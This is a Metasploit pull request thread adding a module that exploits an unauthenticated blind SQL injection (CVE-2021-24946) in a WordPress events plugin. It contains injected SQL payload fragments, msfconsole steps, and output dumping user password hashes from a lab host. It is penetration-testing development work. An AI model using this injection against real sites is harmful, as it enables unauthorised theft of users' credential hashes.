Wordpress Plugin Modern Events Calendar SQLi (CVE-2021-24946)
rapid7/metasploit-framework pull request #16131
Opened 2022-01-30 22:49 UTC by h00die

Unauthenticated SQLi in wordpress plugin Modern Events Calendar. Super simple, just install the plugin, and you're good.

This requires a PR to change the lib from @red0xff which should be coming in the near future.

## Verification

- [ ] Start `msfconsole`
- [ ] Install the plugin, use defaults
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_modern_events_calendar_sqli`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `run`
- [ ] You should get the users and hashes returned.
- [ ] **Document** is good

2022-01-31 15:32 UTC, red0xff requested changes
Short review with a few suggested changes (just suggestions).

2022-01-31 15:32 UTC, red0xff commented on modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.rb
> +      d = Rex::Text.rand_text_numeric(4)
Can be removed if you apply the suggestion that simplifies the SQL query (see below).

```suggestion
```

2022-01-31 15:32 UTC, red0xff commented on modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.rb
> +          'time' => "#{Rex::Text.rand_text_numeric(1)}) AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND (#{d}=#{d}"
Just simplifying the sqlmap query a bit.
```suggestion
          'time' => "#{Rex::Text.rand_text_numeric(1)}) AND (SELECT #{Rex::Text.rand_text_numeric(1)} WHERE #{payload}"
```

2022-01-31 15:32 UTC, red0xff commented on modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.rb
> +    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload| # also tried encoder: :base64 and still not quite getting the right answer.
The option `hex_encode_strings` works differently from encoders (`encoder: :hex` for example).
- `hex_encode_strings` tells the library to use hex numbers to encode strings, instead of `id='admin'`, it'd run `id=0x61646d696e`.
- `encoder: :hex`, or `:base64`, tells the library to yield queries that return the data encoded from the database, for example, `SELECT hex(table_name) FROM INFORMATION_SCHEMA.TABLES LIMIT 1`. It will also take care of decoding data, so this encoding is transparent to the user. It's useful when there is the need to dump data in chinese or arabic for example, and the application doesn't return multibyte characters correctly, or when there are bad characters that the application doesn't display.

You can keep `hex_encode_strings: true` in this case, but there is no need to use an encoder I think.

I will question whether sqli shouldn't be just a local variable instead of an instance var, I see that it's not referenced from any other method within the class.

2022-02-01 20:13 UTC, h00die commented
@red0xff 

with your changes, it didn't work for me:
```
[+] Vulnerable version of Modern Events Calendar detected
[-] payload-failed: 1.1.1.1:80      - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.
[*] Scanned 1 of 1 hosts (100% complete)
```

2022-02-03 00:34 UTC, h00die commented
rebased to incorporate the lib change. Re-tested, working great. Tested w/ suggested changes again and it's not showing vulnerable.

Should be ready to test!

2022-02-28 18:27 UTC, space-r7 commented
Lgtm

```
msf6 > use auxiliary/scanner/http/wp_modern_events_calendar_sqli
msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > set rhost 192.168.140.238
rhost => 192.168.140.238
msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > options

Module options (auxiliary/scanner/http/wp_modern_events_calendar_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COUNT      1                no        Number of users to enumerate
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.140.238  yes       The target host(s), see https://github.com/rapid7/metasploit-fr
                                         amework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


Auxiliary action:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users


msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > set count 5
count => 5
msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > run

[+] wp_users
========

 user_login       user_pass
 ----------       ---------
 admin            $P$BQdcCgoQ/VHDMpE9mZwlWiCwez2wJD/
 editor           $P$BZlA8VCgJD6IlNAzMHgfZEDWGL4OMX1
 test-subscriber  $P$BLSZ2WtMsG8ZFT/CbKtWtT.4D8/vNL.
 writer           $P$BBHfeqiRhZiyb06Sa.FD6y3pZSMqpx/

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

2022-02-28 18:29 UTC, merged